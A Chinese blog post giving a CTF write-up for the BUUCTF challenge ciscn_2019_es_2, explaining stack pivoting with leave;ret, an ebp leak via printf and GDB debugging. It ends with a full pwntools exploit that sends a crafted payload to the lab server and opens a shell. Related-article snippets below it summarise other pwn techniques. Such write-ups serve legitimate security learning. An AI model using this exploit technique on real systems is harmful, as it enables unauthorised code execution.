pwn——栈迁移

已于 2022-07-17 20:48:13 修改
阅读量371 收藏 2
点赞数 1
分类专栏: buuctf刷题记录 文章标签: 安全
于 2022-07-13 11:09:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64195960/article/details/125759777
版权

这道题是栈迁移,题目在buuctf上 ciscn_2019_es_2 

一、先checksec一下

嗯哼哼,貌似影响不大

二、丢在ida里瞅

1、main()

没啥用再看看其它的

2、vul()

第一个read读进去的东西,可以被printf呸!吐出来!

芜湖!看到了第二个read可以栈溢出,但是可以溢出的空间太少!

————————那么就要来到了,刚学习的栈迁移——————————

3、hack()

芜湖看到system函数了,那我们就可以获得system的返回地址从而调用system

三、构造payload

首先我们先想一想

1、printf的作用?

肯定是让我们泄露什么!

我们刚刚说到,要用栈迁移,那么我们我就需要泄露ebp的地址。

所以我们想到用b'a'*(0x27) + b'b'填满栈

然后用printf就会顺带将ebp打印出来

什么printf能打印?

A:"%s"是打印字符串,那么字符串结束的标志是什么???

Q:是/x00!/x00有时候又可以用来截断字符串,并且/x00占据一个字节(这是即使你不打,程序也会自动帮你添上的。)

那么如果我将栈填满

0x00就没地方了,它就会顺着打印,而接下来就是esp的地址了

我们只需要令

orginal_addr = u32(p.recv(4))

就可以获得了

2、继续想

栈迁移核心思想就是利用leave和ret转移ebp和esp。leave和ret常用于复原栈

leave=mov esp,ebp

pop ebp

ret=pop eip

我们看ebp寄存器里面存的其实就是栈上ebp的地址 ,为上层函数main的old ebp,它与缓冲区变量相差0x38

然后我理解的栈迁移是这样的

esp的作用还原栈的最初的模样

“原来我们还是caller的模样”

然后我们通过将ebp的位置改变到现在esp的位置,也就是我们输入的缓冲区的起始位置。

3、GDB调试过程

3.1断点位置

ida中的画面我们可以通过上方彩色进度条拖动,我们刚反编译的时候上方的小箭头可以提供大致位置,找的时候很方便

2ff9bf9b9c883a925602e22f0cb4a6f6.png

然后b *0x080485e0 再然后r,输入时输入aaaa作为标记

3.2查看栈中内容

如下图所示,ebp所在位置中存放的就是上一个ebp的内容,具体研究师傅们自己看看喽

4、理解payload构造过程

a、大小。首先刚开始的第一遍我们在执行read函数,它只允许我们达到0x30的大小,所以payload3

的长度应该控制在0x30之内。(?padding的大小可以商榷吗)

b、我们第一次在执行read函数,在buf的缓冲区有长达0x28的位置,我们做不了什么,不可执行,但是我们通过修改ebp到(old_ebp-0x38),将我们写入的东西通通算进栈中执行。

c、这里我认为有两个定位的东西。

首先是我们放在payload开头的b'aaaa',用于计算和控制ebp返回的位置到这里。(这里不理解的师傅想想leave和ret的作用,核心就是做了坏事还是保持原来的样子,原来怎么样现在怎么样)

其次是old_ebp,因为它的大小可以通过printf泄露,作为一个固定的已知地址,计算其他需要的信息(new_ebp和bin_sh_addr)的偏移量。

d、理解一下leave|ret

e、关于bin_sh的地址师傅们可以看一下wp(通过入栈顺序找到binsh在栈中的地址),前面有4个0x4大小的东西

5、最后附带我的wp

1 from pwn import *

2 p = remote ('node4.buuoj.cn',26738)

3 #context.log_level = 'debug'

4 #p = process('./123')

5

6 system_addr = 0x08048400

7 leave_ret = 0x080484b8

8

9 payload = b'a'*(0x27)+b'b'

10 p.send(payload)

11 p.recvuntil('b')

12 old_ebp = u32(p.recv(4))

13 print(hex(old_ebp))

14

15 payload = b'aaaa'

16 payload+= p32(system_addr) + b'bbbb' + p32(old_ebp-0x28)

17 payload+= b'/bin/sh\x00'

18 payload = payload.ljust(0x28,b'b')

19 payload+= p32(old_ebp-0x38)

20 payload+= p32(leave_ret)

21

22 p.sendline(payload)

23 p.interactive()

参考博客

栈迁移原理介绍与应用 - Max1z - 博客园

qwq-123
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf中pwn题目总结
weixin_41038905的博客
11-16 4749
1.安装 pip install pwntools (python2) pip3 install pwntools (python3) 2.使用 Context设置 context是pwntools用来设置环境的功能。在很多时候,由于二进制文件的情况不同,我们可能需要进行一些环境设置才能够正常运行exp,比如有一些需要进行汇编,但是32的汇编和64的汇编不同,如果不设置context会导致一些问题。一般来说我们设置context只需要简单的一句话: context(os='linux', arch='amd
2020第五空间智能安全大赛PWN——twice
baidu_36110484的博客
06-30 813
0x00背景 这次比赛中的一道pwn题,主要考察了迁移和泄露canary。之前没有接触过迁移,所以当时没有做出来(好多人都做出来了,捂脸)。 没办法,菜鸡只能赛后复盘。注:虚拟机环境使用的动态库为kali的libc-2.30.so 0x01源码分析 主要代码逻辑如下,main函数之后可以进行两次输入,然后将输入的字符串打印出来。第一次输入可以溢出一个字节,用于泄露canary和地址(用于之后的迁移),第二次输入可以溢出到返回地址,修改程序流程完成迁移,从而执行ROP链。 0x02 exp构造 需
ctf pwn 题目
m0_64195960的博客
04-11 1386
2022年3月21迁移 这道题是迁移 1)先checksec一下 嗯哼哼,貌似影响不大 2)丢在ida里瞅 1、main() 没啥用再看看其它的 2、vul() 第一个read读进去的东西,可以被printf呸!吐出来! 芜湖!看到了第二个read可以溢出,但是可以溢出的空间太少! ————————那么就要来到了,刚学习的迁移—————————— 3、hack() 芜湖看到system函数了,那我们就可以获得system的返回地址从而调用.
PWN——迁移
L2329794714的博客
08-29 1549
简单一句话就是控制esp指针的指向。实现指令:eave;ret 指令Leave等价于:其实就是在做恢复上一次空间的操作。但这过程中能恢复到上次的的关键数据为当前ebp指向地址上值(oldebp),当我们通过溢出覆盖原本的oldebp值时,然后将leave;ret 程序段地址放在返回地址上,那么就可以实现将esp迁移至我们想要的地方(取决于oldebp上的覆盖的地址,注意这里会抬高4字节,64位抬8字节)。第一次leave第一次ret:因为esp还是指向leave;.........
Linux PWN技巧之迁移
小小鱼的博客
02-16 1816
简介 迁移简单将就是控制EBP/RBP、ESP/RSP寄存器,让帧指向一段我们可以控制的内存,从而实现控制上执行内容、控制程序执行流程的目的。 迁移一般会将帧指向bss段(其他可读写内存段也可以),这种技巧是为了解决上空间太小,不够写入完整payload的情况。比如有个程序存在溢出的漏洞,但溢出的长度不够,只够覆盖到返回地址,不能读入完整的rop链,这种情况就可能要用到迁移的技巧了 利用介绍 以32位程序为例,描述一下迁移的核心思想。 首先要理解leave和ret汇编指令的作用: lea
pwn入门之迁移
wangxunyu6的博客
03-08 1327
迁移可以用于处理溢出的情况。当溢出且可溢出长度不足以容纳 payload 时,可以通过迁移来构建一个新的空间以放下 payload。
cisn_2019_es_3——ROP迁移
weixin_44164182的博客
07-17 198
ROP迁移 通过leave和ret指令,将帧劫持到指定地址。一般用于存在溢出,但可溢出的字节数不足以写入完成ROP chain的情况。通过帧劫持,在可供写入的缓冲区内完成ROP chain构造,然后将帧劫持到指定地址,完成控制流劫持。 leave = mov esp,ebp pop ebp ret= pop eip 通过帧劫持,存在溢出的位置最少只需溢出两个dword(qword in x64)就可以完全控制程序执行流 如上程序,char s处存在两个dword的溢出,可以覆盖last_
【CTF资料-0x0002】PWN简易Linux堆利用入门教程by arttnba3
arttnba3的博客
02-25 5057
【CTF资料-0x0002】简易Linux堆利用入门教程by arttnba3老生常谈,[GITHUB BLOG ADDR](https://archive.next.arttnba3.cn/2021/02/24/%E3%80%90CTF%E8%B5%84%E6%96%99-0x0002%E3%80%91%E7%AE%80%E6%98%93Linux%E5%A0%86%E5%88%A9%E7%94%A8%E5%85%A5%E9%97%A8%E6%95%99%E7%A8%8Bby%20arttnba3/),请
红队专题-REVERSE汇编/二进制PWN/逆向/反编译
aming小老弟
10-10 1102
ROP(Return-Oriented Programming)链是一种计算机安全领域中的攻击技术,用于绕过内存执行保护措施,实现利用漏洞进行代码注入和控制流劫持。由一系列已存在于程序内存中的代码片段(称为gadget)组成的,这些片段通常是程序的合法指令序列。通过将这些gadget按照特定的顺序串联起来,攻击者可以构造出一条可执行的ROP链,用于实现特定的攻击目的。ROP链的基本原理依赖于已存在的代码片段,而不是插入自定义的恶意代码。这样可以避免执行数据区域中的恶意代码,
【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1317
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二进制反汇编、密码学、隐写术等。每个类别都包含多个挑战,每个挑战都有一个或多个标志(flag)。参赛者必须通过解决每个挑战来获取相应的标志,然后提交标志以获得积分。比赛通常在一定的时间内进行,参赛者可以单独或组队参加。 此外,CTF题库也提供了一个实践和交流的平台,使参赛者能够在真实的环境中测试和展示他们的技能。在比赛中,参赛者可以学习新的技能,了解新的安全趋势,并结识志同道合的人。此外,CTF比赛也是一种很好的锻炼方式,能够帮助参赛者提高解决问题的能力和团队协作能力。 CTF题库是学习和提高网络安全技能的极好途径。它们提供了一个实践和交流的平台,使参赛者能够在真实的环境中测试和展示他们的技能。如果您对网络安全感兴趣,请尝试参加一个CTF比赛或挑战集,它们将为您提供有趣和具有挑战性的体验。
CTF中的pwn基础题
2301_81031055的博客
01-23 836
mprotect 函数用于设置一块内存的保护权限(将从 start 开始、长度为 len 的内存的保护属性修改为 prot 指定的值)elf跟libc是两个单独的文件,elf里的函数想要执行,就得先进入plt表,然后在进入got,got表里的是函数的真实地址。通过观察IDA中左边的函数,发现没有后门函数,也没有system函数考虑使用ret2libc解题。通过调试发现,main函数与后门函数的地址相差一个字节,所以将09打包成一个字节。发现有溢出且溢出了一个字节,shift+f12查看发现有后门函数。
pwn刷题num43---迁移
tbsqigongzi的博客
05-03 675
BUUCTF-PWN-ciscn_2019_es_2 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在溢出 开启NX保护-----堆不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下伪代码 可以看到read函数读入0x30字节给s,可是s是0x28字节大小,只相差0x8字节,只能覆盖ebp和函数返回地址,而程序中无直接getshell的函数,程序
PWN题型之迁移
swedsn
07-30 1648
文章目录前言0x1 :基本知识:0x2 :利用思路 :0x3 :实例讲解 前言 0x1 :基本知识: (1)存在溢出,但是溢出的长度不够,你输入的内容最多只能覆盖掉ret返回地址,而之后的rop链无法构造。 (2)就是之前的.bas 0x2 :利用思路 : 0x3 :实例讲解 ...
pwn】 关于迁移
wintersun的地带
05-19 3153
[pwn] 关于迁移在我们仅仅只能够控制ebp的情况下,我们怎么才能够控制eip去拿到我们的shell呢。以下为科普以32位程序举例,在使用call这个命令,进入一个函数的时候,程序会进行一系列操作: push eip+4;push ebp;mov ebp,esp;来保护现场,避免执行完函数后堆不平衡以及找不到之前的入口地址。执行完函数后会进行一系列操作来还原现场leave;ret; 这
[PWN]——迁移及部分基础
最新发布
ysy___ysy的博客
04-18 1255
由高到低,自顶向下增长,ebp指向底 【减(push)即指针向高移,加(pop)即指针向低移】。溢出能使我们覆盖上某些区域的值,甚至是当前函数的返回地址 ret;一旦 ret 覆盖为某个奇怪的值,例如 0xdeadbeaf,当函数结束恢复现场,即 eip 指向 ret 时,程序将会跳转到内存中的 0xdeadbeaf 处。此时,内核会立即告诉我们“SIGSEV”,即常见的段错误(Segment Fault)。注意:函数传参时从右往左。
pwn--迁移
weixin_44642009的博客
04-17 971
迁移–ROP 本次实验我们使用lab4的可执行文件。 在开始之前我们需要明确一些问题以及需要注意的地方,以下我会讲到,这也是在实验过程中我碰到的一些情况和解题关键: 为什么使用迁移? 由上图可知,程序开辟的堆大小是0x50字节,而read函数输入可以输入0x60字节,明显存在溢出的可能,不过可输入的字节数不是足够多,空间较小,不足以使我们填入足够的ROP链,所以我们需要迁移。 ...
CTF-PWN迁移
m0_53921051的博客
04-05 855
帧介绍 C语言函数调用帧_大佬菜菜带带的博客-CSDN博客 迁移背景 在溢出构造rop链时,有时我们会遇到构造空间不够的情况。比如我们需要构造0x30字节的数据,而read()只能读入0x28字节。但是我们可以控制ebp及ret的值,此时可以利用迁移的方法拓展空间。 迁移条件 能够控制rbp及ret的值。 拥有一块可执行的内存,并且可以连续两次控制该内存。 迁移原理 在函数调用完返回时,会执行leave,ret两条汇编指令。 leave: mov esp ebp; pop
迁移(leave ret)(更适合pwn宝宝体质的迁移~)
Kata_Jhin的博客
05-15 1760
更适合pwn入门新手体质的迁移教程
pwn+溢出解题思路
11-10
溢出是一种常见的漏洞,攻击者可以通过利用溢出漏洞来执行恶意代码。pwn是一种利用溢出漏洞的攻击方式,通常用于CTF比赛中。下面是一些pwn解题思路的步骤: 1. 找到漏洞:首先需要找到程序中的漏洞,通常是溢出漏洞或格式化字符串漏洞。 2. 利用漏洞:利用漏洞来执行恶意代码,通常是通过覆盖返回地址或修改函数指针来实现。 3. 获取shell:利用漏洞执行恶意代码后,需要获取shell来进一步控制系统。可以通过调用system函数来执行shell命令。 4. 获取函数地址:在一些情况下,需要获取函数的地址来执行攻击。可以通过泄露函数地址或者使用动态链接库来获取函数地址。 5. 绕过保护机制:现代操作系统通常会有一些保护机制来防止pwn攻击,例如随机化、地址空间布局随机化等。攻击者需要找到绕过这些保护机制的方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值